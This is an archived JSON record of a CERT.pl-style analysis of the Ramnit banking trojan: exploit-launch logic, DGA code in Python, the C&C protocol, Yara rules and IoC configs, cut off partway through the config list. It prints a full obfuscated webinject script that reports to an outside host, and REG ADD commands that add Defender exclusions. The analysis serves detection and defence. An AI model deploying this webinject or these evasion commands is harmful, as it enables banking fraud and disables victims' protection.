{
	"id": "1563f2e4-6c9f-44d2-93ba-e63184ff9853",
	"created_at": "2026-04-06T00:19:43.977559Z",
	"updated_at": "2026-04-10T13:12:07.702472Z",
	"deleted_at": null,
	"sha1_hash": "07ab2a6b2f52f1ef945158544d3b8098a2c5bd8e",
	"title": "Ramnit – in-depth analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 621064,
	"plain_text": "Ramnit – in-depth analysis\r\nArchived: 2026-04-05 19:37:55 UTC\r\nIf we look at Ramnit’s history, it’s hard to pin down exactly which malware family it actually belongs to. One\r\nthing is certain: it’s not a new threat. It emerged in 2010, transferred by removable drives within infected\r\nexecutables and HTML files.\r\nA year later, a more dangerous version was released. It contained a part of the recently leaked Zeus source code,\r\nwhich allowed Ramnit to become a banking trojan.\r\nThese days, it has become much more sophisticated by utilizing a number of malicious activities including:\r\nPerforming Man-in-the-Browser attacks\r\nStealing FTP credentials and browser cookies\r\nUsing DGA (Domain Generation Algorithm) to find the C\u0026C (Command and Control) server\r\nUsing privilege escalation\r\nAdding AV exceptions\r\nUploading screenshots of sensitive information\r\nDespite Europol’s shutdown of 300 C\u0026C servers in 2015, it’s still going strong, recently being\r\ndistributed by RIG EK via seamless gates.\r\nExecutable’s analysis\r\nThe main binary is packed like a matryoshka – a custom packing method first and then UPX.\r\nDespite being encrypted, extracting the binary from the packer is pretty straightforward – all one\r\nneeds to do is to set a breakpoint right after the binary decrypts the code and before it jumps into it.\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 1 of 22\n\nAnd if we now navigate to the newly unpacked code section we’ll find the binary right after the loader\r\nassembly:\r\nThe unpacked binary (after UPX decompression) consists of 3 general functions:\r\nApplyExploit\r\nCheckBypassed\r\nstart\r\nApplyExploit\r\nIf the current user is not already an admin and the process is not running with admin privileges, it tries\r\nto perform privilege escalation.\r\nThe malware contains exploits for CVE-2013-3660 (patched in MS13-053) and CVE-2014-4113 (patched\r\nin MS14-058) vulnerabilities; however, 
before it actually tries to run the payload, registry checks are\r\nperformed to make sure that the host system is indeed vulnerable to said CVEs:\r\nint __cdecl try_to_exploit(LPSTR lpCommandLine)\r\n{\r\nif ( !is_win8() \u0026\u0026 !is_win8_1() )\r\n{\r\nif ( is_xp() )\r\n{\r\nif ( !check_updates_xp((int)\"KB3000061\") )\r\n{\r\nif ( is_admin() )\r\nreturn 1;\r\nLABEL_6:\r\nexecute_CVE_2014_4113(lpCommandLine);\r\nreturn 1;\r\n}\r\n}\r\nelse if ( !check_updates_other((int)\"KB3000061\") )\r\n{\r\nif ( is_admin() \u0026\u0026 check_authority() \u003e 1 )\r\nreturn 1;\r\ngoto LABEL_6;\r\n}\r\ntry_second_exploit(lpCommandLine);\r\nreturn 1;\r\n}\r\nreturn 0;\r\n}\r\nvoid __cdecl try_second_exploit(LPCSTR lpCommandLine)\r\n{\r\nbool v1; // al@2\r\nif ( is_xp() )\r\nv1 = check_updates_xp((int)\"KB2850851\");\r\nelse\r\nv1 = check_updates_other((int)\"KB2850851\");\r\nif ( !v1 \u0026\u0026 !get_dir() )\r\n{\r\nexecute_CVE_2013_3660(lpCommandLine);\r\nSleep(500u);\r\n}\r\n}\r\nIf the exploits succeed or the program is already running with high privileges, a “TRUE” value is\r\nstored in a hardcoded, random-looking registry key:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\jfghdug_ooetvtgk,\r\nwhich is later used in the CheckBypassed function.\r\nCheckBypassed\r\nThis function checks whether the previously mentioned registry key is set. If it is not and the process has admin\r\nprivileges, it updates it. 
Assuming the exploit has worked, Ramnit then adds registry keys to evade\r\ndetection by Windows’ security systems (see Obfuscation/Evasion):\r\nsigned int __stdcall CheckBypassed()\r\n{\r\nBYTE Data; // [esp+Ch] [ebp-104h]@7\r\nif ( is_xp() \u0026\u0026 is_admin() )\r\nreturn 4;\r\nif ( is_xp() )\r\nreturn 0;\r\nif ( check_authority() \u003c= 1 )\r\n{\r\nif ( !check_authority()\r\n\u0026\u0026 !RegCheckKey(\r\nHKEY_LOCAL_MACHINE,\r\n\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\\",\r\n\"jfghdug_ooetvtgk\",\r\n\u0026Data,\r\n260) )\r\n{\r\nreturn 3;\r\n}\r\nreturn 0;\r\n}\r\nOutputDebugStringA(\"CheckBypassed ok\");\r\nif ( !RegCheckKey(\r\nHKEY_LOCAL_MACHINE,\r\n\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\\",\r\n\"jfghdug_ooetvtgk\",\r\n\u0026Data,\r\n260) )\r\nreturn 2;\r\nRegSetKey(HKEY_LOCAL_MACHINE, \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\\", \"jfghdug_ooetvtgk\", \"TRUE\", 0);\r\nhide_me_from_defender();\r\nreturn 1;\r\n}\r\nstart routine\r\nThe routine coordinates ApplyExploit and CheckBypassed – if they both run successfully it creates two\r\nsvchost.exe processes and writes rmnsoft.dll and modules.dll into them respectively.\r\nImportant detail: the binary executes CheckBypassed before ApplyExploit, so the binary has to be\r\nexecuted again in order to make any further progress. This trick outsmarts many single-run malware\r\nanalysis systems, such as Cuckoo.\r\nStatic config\r\nRamnit encrypts its network communication using the RC4 algorithm. 
The RC4 key and botnet name are\r\nencrypted using XOR with a hardcoded password.\r\nXOR encryption is pretty standard; the only catch is that it skips the key’s first character and then reverses the\r\nkey.\r\nvoid __stdcall xor(char *input, int input_length, char *xor_secret, int xor_secret_length)\r\n{\r\nint v4; // ecx@3\r\nchar *v5; // edi@3\r\nint v6; // edx@3\r\nif ( input_length \u0026\u0026 xor_secret_length )\r\n{\r\nv4 = input_length;\r\nv5 = input;\r\nv6 = 0;\r\ndo\r\n{\r\nif ( !v6 )\r\nv6 = xor_secret_length - 1;\r\n*v5 ^= xor_secret[v6];\r\n++v5;\r\n--v6;\r\n--v4;\r\n}\r\nwhile ( v4 );\r\n}\r\n}\r\nXOR function calls:\r\nxor(\u0026botnet_name, 110, (char *)\u0026xor_secret, xor_secret_length);\r\nxor(\u0026rc4_key, 59, (char *)\u0026xor_secret, xor_secret_length);\r\nCiphertext lengths are almost always too long and we have to rely on null termination:\r\n\u003e\u003e\u003e xor_key = \"1\\x8F\\x31\\xCD\\x95\"\r\n\u003e\u003e\u003e rc4_key_encrypted = \"\\xF3\\xA8\\x5F\\xFE\\xE0\\xB4\\x58\\xEB\\xFD\\xCD\"\r\n\u003e\u003e\u003e crypto.xor(rc4_key_encrypted, xor_key[1:][::-1])\r\n'fenquyidh\\x00'\r\nThe DGA config seems to always be declared at the beginning of the data section:\r\nPersistence\r\nThe program copies itself into C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\.\r\nDGA\r\nRamnit generates a list of domains by using an LCG algorithm with a hardcoded seed:\r\nunsigned int __stdcall rand_int(unsigned int seed, unsigned int mod)\r\n{\r\nreturn (16807 * (seed % 0x1F31D) - 2836 * (seed / 0x1F31D)) % mod;\r\n}\r\nGenerating a domain:\r\nDGA recreated in Python:\r\ndef dga(seed):\r\n    domain = \"\"\r\n    domain_length, new_seed = rng(seed, 12)\r\n    domain_length += 8\r\n    seed_after_length = new_seed\r\n    for i in range(domain_length):\r\n        c, new_seed = rng(new_seed, 
25)\r\n        domain += chr(c + ord('a'))\r\n    # multiply original seed and seed after getting random length\r\n    seed *= seed_after_length\r\n    # add together lower and higher 32 bits of product of multiplication\r\n    seed = ((seed \u003e\u003e 32) + (seed \u0026 0xffffffff)) \u0026 0xffffffff\r\n    domain += \".com\"\r\n    return domain, seed\r\nCommunication\r\nRamnit connects to C\u0026C servers through port 443, but don’t let that fool you – it doesn’t use HTTPS,\r\nbut its own protocol instead:\r\nPacket’s structure:\r\nstruct packet {\r\nbyte[2] magic; // set to \"\\x00\\xff\"\r\ndword packet_data_length;\r\nbyte command;\r\nbyte[packet_data_length] data;\r\n}\r\nChunks’ structures:\r\nstruct chunk_0 {\r\nbyte magic; // set to \"\\x00\"\r\ndword data_size;\r\nbyte[data_size] data; // encrypted using rc4\r\n}\r\nstruct chunk_1 {\r\nbyte magic; // set to \"\\x01\"\r\ndword data;\r\n}\r\nstruct chunk_2 {\r\nbyte magic; // set to \"\\x02\"\r\ndword data_1;\r\ndword data_2;\r\n}\r\nSo if we’d like to send a packet containing some data, we would:\r\nencrypt large (\u003e4 bytes) chunk data using RC4 with a key recovered from the XOR decryption\r\ncreate packed chunks from data parts\r\nconcatenate all chunks together\r\nwrap the output in the packet layer\r\nTraffic example:\r\nSome of the available commands:\r\nCommand                    Byte value  Short description\r\nCOMMAND_OK                 0x01        Server’s response that the command executed successfully\r\nGET_DNSCHANGER             0x11        Get DNS-changer payload\r\nGET_INJECTS                0x13        Get webinjects\r\nUPLOAD_COOKIES             0x15        Upload stolen cookies (zip format)\r\nGET_MODULE                 0x21        Get a specific module\r\nGET_MODULE_LIST            0x23        Get a list of downloadable modules\r\nVERIFY_HOST                0x51        Check if the host is able to send a signed message\r\nREGISTER_BOT               0xe2        Register bot (send two MD5s)\r\nUPLOAD_INFO_GET_COMMANDS   0xe8        Upload 
detailed machine info\r\nBot registration\r\nWhen a bot wants to register itself it sends two encrypted MD5 hashes, the data structures of which are as\r\nfollows:\r\nstruct MD5_1_data {\r\nDWORD VolumeSerialNumber;\r\nDWORD VersionInformation.dwBuildNumber;\r\nDWORD VersionInformation.dwMajorVersion;\r\nDWORD VersionInformation.dwMinorVersion;\r\nWORD SystemInfo.u.s.wProcessorArchitecture;\r\nDWORD SystemInfo.dwActiveProcessorMask;\r\nDWORD SystemInfo.dwNumberOfProcessors;\r\nDWORD SystemInfo.dwProcessorType;\r\nWORD SystemInfo.wProcessorLevel;\r\nWORD SystemInfo.wProcessorRevision;\r\nBYTE[16] ComputerName;\r\n}\r\nstruct MD5_2_data {\r\nBYTE[8] magic_const; // set to \"45Bn99gT\"\r\nBYTE[32] MD5_1;\r\n}\r\nPython code:\r\nimport hashlib\r\nMD5_1 = \"f054bbd2f5ebab9cb5571000b2c50c02\"\r\nMD5_2 = hashlib.md5(\"45Bn99gT\" + MD5_1).hexdigest()\r\nIf the C\u0026C responds with a success packet (00ff0100000001), the malware follows up with an empty 0x51\r\ncommand. The signature from the response is verified using a hardcoded RSA public key. 
If there is a\r\nmismatch, the execution stops.\r\nModules\r\nThe program can request a list of modules and then download each one individually:\r\nAntivirus Trusted Module v2.0\r\nAdds exceptions to a fixed list of anti-virus software (AVG Anti-Virus, BitDefender, Avast, ESET\r\nNOD32 Antivirus, Norton AntiVirus)\r\nChrome reinstall module (x64-x86) v0.1\r\nUninstalls Google Chrome:\r\n%programfiles(x86)%\\\\Google\\\\Chrome\\\\Application\\\\%s\\\\Installer\\\\setup.exe --uninstall --multi-install --chrome --system-level --force-uninstall\r\nand installs it again:\r\nhttps://dl.google.com/tag/s/appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}\u0026iid={9D8A3851-D347-A540-6FC8-7438A91AB637}\u0026lang=en\u0026browser=4\u0026usagestats=0\u0026appname=Google%20Chrome\u0026needsadmin=false/update2/installers/Chrom\r\nCookie Grabber v0.2 (no mask)\r\nSteals cookies from various hardcoded locations and sends a zip with the results to the C\u0026C through\r\nrmnsoft.dll.\r\nHooker\r\nUsed for performing Man-in-the-Browser attacks and hooking HTTP functions.\r\nWebinjects\r\nWebinjects are a relatively new addition to Ramnit. 
They utilize a standard Zeus format:\r\nentry \"WebFilters\"\r\nhttps*\r\nend\r\nentry \"WebDataFilters\"\r\nhttps*\r\nend\r\nset_url https://REDACTED* GP\r\ndata_before\r\n\u003cbod*\u003e\r\ndata_end\r\ndata_inject\r\n\u003cscript id=\"loader\" type=\"text/javascript\"\u003e\r\ndocument.body.style.display = \"none\";\r\n(function() {\r\nvar _0x7f7f = [\"\\x53\\x43\\x52\\x49\\x50\\x54\",\r\n\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\", \"\\x3F\\x72\\x61\\x6E\\x64\\x3D\",\r\n\"\\x72\\x61\\x6E\\x64\\x6F\\x6D\", \"\\x26\",\r\n\"\\x61\\x6A\\x61\\x78\\x5F\\x72\\x65\\x61\\x64\\x79\\x53\\x74\\x61\\x74\\x65\",\r\n\"\\x6F\\x6E\\x6C\\x6F\\x61\\x64\",\r\n\"\\x6F\\x6E\\x72\\x65\\x61\\x64\\x79\\x73\\x74\\x61\\x74\\x65\\x63\\x68\\x61\\x6E\\x67\\x65\",\r\n\"\\x73\\x72\\x63\", \"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\r\n\"\\x70\\x61\\x72\\x65\\x6E\\x74\\x4E\\x6F\\x64\\x65\", \"\\x73\\x63\\x72\\x69\\x70\\x74\",\r\n\"\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x42\\x79\\x54\\x61\\x67\\x4E\\x61\\x6D\\x65\",\r\n\"\\x72\\x65\\x61\\x64\\x79\\x53\\x74\\x61\\x74\\x65\", \"\\x6C\\x6F\\x61\\x64\\x65\\x64\",\r\n\"\\x63\\x6F\\x6D\\x70\\x6C\\x65\\x74\\x65\", \"\\x61\\x70\\x70\\x6C\\x79\",\r\n\"\\x72\\x65\\x6D\\x6F\\x76\\x65\\x43\\x68\\x69\\x6C\\x64\",\r\n\"\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4A\\x4B\\x4C\\x4D\\x4E\\x4F\\x50\",\r\n\"\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5A\\x61\\x62\\x63\\x64\\x65\\x66\",\r\n\"\\x67\\x68\\x69\\x6A\\x6B\\x6C\\x6D\\x6E\\x6F\\x70\\x71\\x72\\x73\\x74\\x75\\x76\",\r\n\"\\x77\\x78\\x79\\x7A\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x2B\\x2F\", \"\\x3D\", \"\",\r\n\"\\x72\\x65\\x70\\x6C\\x61\\x63\\x65\", \"\\x63\\x68\\x61\\x72\\x41\\x74\",\r\n\"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66\", \"\\x66\\x72\\x6F\\x6D\\x43\\x68\\x61\\x72\\x43\\x6F\\x64\\x65\",\r\n\"\\x6C\\x65\\x6E\\x67\\x74\\x68\"];\r\nfunction 
sendScriptRequest(_0xade3x2, _0xade3x3, _0xade3x4, _0xade3x5) {\r\nvar _0xade3x6 = document[_0x7f7f[1]](_0x7f7f[0]);\r\nif (_0xade3x3) {\r\n_0xade3x3 = _0x7f7f[2] + Math[_0x7f7f[3]]() + _0x7f7f[4] + _0xade3x3;\r\n} else {\r\n_0xade3x3 = _0x7f7f[2] + Math[_0x7f7f[3]]();\r\n};\r\n_0xade3x6[_0x7f7f[5]] = false;\r\n_0xade3x6[_0x7f7f[6]] = scriptCallback(_0xade3x6, _0xade3x4, _0xade3x5);\r\n_0xade3x6[_0x7f7f[7]] = scriptCallback(_0xade3x6, _0xade3x4, _0xade3x5);\r\n_0xade3x6[_0x7f7f[8]] = _0xade3x2 + _0xade3x3;\r\ndocument[_0x7f7f[12]](_0x7f7f[11])[0][_0x7f7f[10]][_0x7f7f[9]](_0xade3x6);\r\n};\r\nfunction scriptCallback(_0xade3x6, _0xade3x4, _0xade3x5) {\r\nreturn function() {\r\nif (_0xade3x6[_0x7f7f[5]]) {\r\nreturn;\r\n};\r\nif (!_0xade3x6[_0x7f7f[13]] || _0xade3x6[_0x7f7f[13]] == _0x7f7f[14] ||\r\n_0xade3x6[_0x7f7f[13]] == _0x7f7f[15]) {\r\n_0xade3x6[_0x7f7f[5]] = true;\r\n_0xade3x4[_0x7f7f[16]](_0xade3x6, _0xade3x5);\r\n_0xade3x6[_0x7f7f[10]][_0x7f7f[17]](_0xade3x6);\r\n};\r\n};\r\n};\r\nfunction decode64(_0xade3x9) {\r\n...\r\n};\r\nvar bn = \"US_\" + \"CHASE_2\";\r\nvar bot_id = \"\u003c%IDBOT%\u003e_\" + bn;\r\nvar sa = decode64(\"aHR0cHM6Ly9jaGFzZWRlZC53ZWJzaXRlL2FkbTEyL2kucGhw\");\r\nvar req = \"send=0\u0026u_bot_id=\" + bot_id + \"A\u0026bn=\" + bn +\r\n\"\u0026page=0\u0026u_login=\u0026u_pass=\u0026log=\" + 'get_me_core';\r\nsendScriptRequest(sa, req, function statusCall1() {\r\nvar element = document.getElementById(\"loader\");\r\nelement.parentNode.removeChild(element);\r\n});\r\n})();\r\n\u003c/script\u003e\r\ndata_end\r\nObfuscation / Evasion\r\nRamnit attempts to hide itself from Windows Defender by adding the following registry values:\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Extensions \\\" /v *.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD 
\\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Extensions \\\" /v *.dll /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Extensions \\\" /v *.tmp /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Processes \\\" /v afwqs.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Processes \\\" /v rgjdu.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Processes \\\" /v explorer.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Processes \\\" /v spoolsv.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Processes \\\" /v rundll32.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Processes \\\" /v consent.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Processes \\\" /v svchost.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Extensions \\\" /v *.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Extensions \\\" /v *.dll /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Extensions \\\" /v *.tmp /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD 
\\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Processes \\\" /v afwqs.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Processes \\\" /v rgjdu.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Processes \\\" /v explorer.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Processes \\\" /v spoolsv.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Processes \\\" /v rundll32.exe /t REG_DWORD /d 0\");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Processes \\\" /v consent.exe /t REG_DWORD /d 0\");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Processes \\\" /v svchost.exe /t REG_DWORD /d 0 \");\r\n‘NOPs’ are inserted in random functions, which makes them difficult to find using e.g. 
a Yara rule:\r\nNew variant\r\nWhile writing this article we noticed a variant of Ramnit called clickbideu in an Italian spam\r\ncampaign.\r\nIts loader is completely different, but the communication module (rmnsoft.dll) has remained largely\r\nunchanged, with only some minor differences:\r\nThe DGA cycles between 3 hardcoded TLDs instead of just one:\r\nchar *add_tld(int tld_no)\r\n{\r\nconst char *v1;\r\nint result;\r\nint v3;\r\nv3 = 0;\r\nv1 = a_click; // \".click\", \".bid\", \".eu\"\r\nwhile ( v3 != tld_no )\r\n{\r\nresult = strlen(v1);\r\nv1 += result + 1;\r\nif ( !*v1 )\r\nreturn result;\r\n++v3;\r\n}\r\nreturn v1;\r\n}\r\nPython implementation:\r\ntlds = ['.click', '.bid', '.eu']\r\ndomains = []\r\nfor i in range(domain_no):\r\n    domain, dga_seed = gen_domain(dga_seed)\r\n    domain += tlds[i % len(tlds)]\r\n    domains.append(domain)\r\nThe new version also seems to use a different port, 8001, although we’ve also seen port 442 in use.\r\nAdditionally, a different value (“fE4hNy1O”) is used for calculating the second MD5.\r\nAdditional links\r\nhttps://www.virusbulletin.com/virusbulletin/2012/11/ramnit-bot\r\nhttps://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf\r\nhttp://blog.trendmicro.com/trendlabs-security-intelligence/ramnit-comeback-story-2016/\r\nIoCs\r\nYara rules:\r\nimport \"pe\"\r\nrule ramnit_general {\r\n    meta:\r\n        author = \"nazywam\"\r\n        module = \"ramnit\"\r\n    strings:\r\n        $guid = \"{%08X-%04X-%04X-%04X-%08X%04X}\"\r\n        $md5_magic_1 = \"15Bn99gT\"\r\n        $md5_magic_2 = \"1E4hNy1O\"\r\n        $init_dga = { C7 ?? ?? ?? ?? ?? FF FF FF FF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? }\r\n        $xor_secret = { 8A ?? ?? 32 ?? 88 ?? 4? 4? E2 ?? 
}\r\n        $init_function = { FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 }\r\n        $dga_rand_int = { B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 }\r\n        $cookies = \"\\\\cookies4.dat\"\r\n        $s3 = \"pdatesDisableNotify\"\r\n        $get_domains = { a3 [4] a1 [4] 80 3? 00 75 ?? c7 05 [4] ff ff ff ff ff 35 [4] ff 35 [4] ff 35 [4] e8 }\r\n        $add_tld = { 55 8B EC 83 ?? ?? 57 C7 ?? ?? 00 00 00 00 B? ?? ?? ?? ?? 8B ?? ?? 3B ?? ?? 75 ?? 8B ?? }\r\n        $get_port = { 90 68 [4] 68 [4] FF 35 [4] FF 35 [4] E8 [4] 83 }\r\n    condition:\r\n        $init_dga and $init_function and 2 of ($guid, $md5_magic_*, $cookies, $s3) and any of ($get_port, $add_tld, $dga_rand_int, $get_domains, $xor_secret)\r\n}\r\nrule ramnit_dll {\r\n    meta:\r\n        author = \"nazywam\"\r\n        module = \"ramnit\"\r\n    condition:\r\n        pe.characteristics and pe.DLL and ramnit_general\r\n}\r\nrule ramnit_injector {\r\n    meta:\r\n        author = \"nazywam\"\r\n        module = \"ramnit\"\r\n    strings:\r\n        $unpack_dlls = { B8 [4] 50 E8 [4] A3 [4] 68 [4] 68 [4] FF [5] E8 [4] B8 [4] 50 E8 [4] A3 [4] 68 [4] 68 [4] FF [5] E8 }\r\n    condition:\r\n        $unpack_dlls and ramnit_general\r\n}\r\nSamples analyzed:\r\nMain PE\r\n92460d8ac1d1e9f155ef2ca6dd7abb417df8900a17e95157d4372a2c846e829f\r\nrmnsoft.dll\r\nbe2044fe6f0220dde12c51677f2ef4c45d9dea669073bd052695584e573629e0\r\nmodules.dll\r\n96a10e07d092f6f429672ce2ca66528aae19de872bda39249135a82477d27a83\r\nModule Antivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)\r\n975ed0f933d4a22ca631c5ab77c765cd46c48511d43326b066b4505c6dc911de\r\nModule Cookie Grabber v0.2 (no mask)\r\nbc977a0f455fc747a7868a7940aa98af10c91c4aae7598310de8b78132436bee\r\nModule Hooker\r\na88151b3bf825e26ded28f94addeada095d2cd13791b2153a9594b26d9cfb85e\r\nConfigs:\r\n\"{'config_type': 10,'dga_seed': 790544302, 'harcoded_domain': '', 
'dga_domain_no': 40,\r\n'rc4_key': 'fB1oN5frGqf', 'config_magic': '26', 'dga_tlds': ['.click', '.bid', '.eu'], 'md5_magic':\r\n'fE4hNy1O', 'port': 8001}\"\r\n\"{'config_type': 15,'dga_seed': 1124253770, 'harcoded_domain': 'oqdmeolksujhud.click',\r\n'dga_domain_no': 10, 'rc4_key': 'fB1oN5frGqf', 'config_magic': '3', 'dga_tlds': ['.click', '.bid',\r\n'.eu'], 'md5_magic': 'fE4hNy1O', 'port': 442}\"\r\n\"{'config_type': 7, 'dga_seed': 1108585239, 'dga_domain_no': 50, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'ujdnnaaah61996y.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 1458440109, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'atw82ye63ymdp.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 2039546858, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'test', 'harcoded_domain':\r\n'doisafjsnbjesfbejfbkjsej88.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 2435699865, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'b18w187yebsoi.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 2695420049, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'test', 'harcoded_domain':\r\n'funtikmuntiktribakaka9.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 2960547961, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'seo4', 'harcoded_domain':\r\n'dakdji282euijdsnkdlks.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 3738229229, 'dga_domain_no': 15, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'test', 'harcoded_domain':\r\n'mudsaoojbjijj999.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 3801515385, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 
'config_magic': 'demetra', 'harcoded_domain':\r\n'hdyejdn638ir8.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 3815882521, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'test', 'harcoded_domain':\r\n'dsanfjiasfn22as.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 3998246919, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'g283yr84iri4i.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 4040478694, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'hye739indlir73ue.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 4096376725, 'dga_domain_no': 50, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'ju37yebdhf72938.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 4205202272, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'hd63ueor8473y.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 57607789, 'dga_domain_no': 15, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'test', 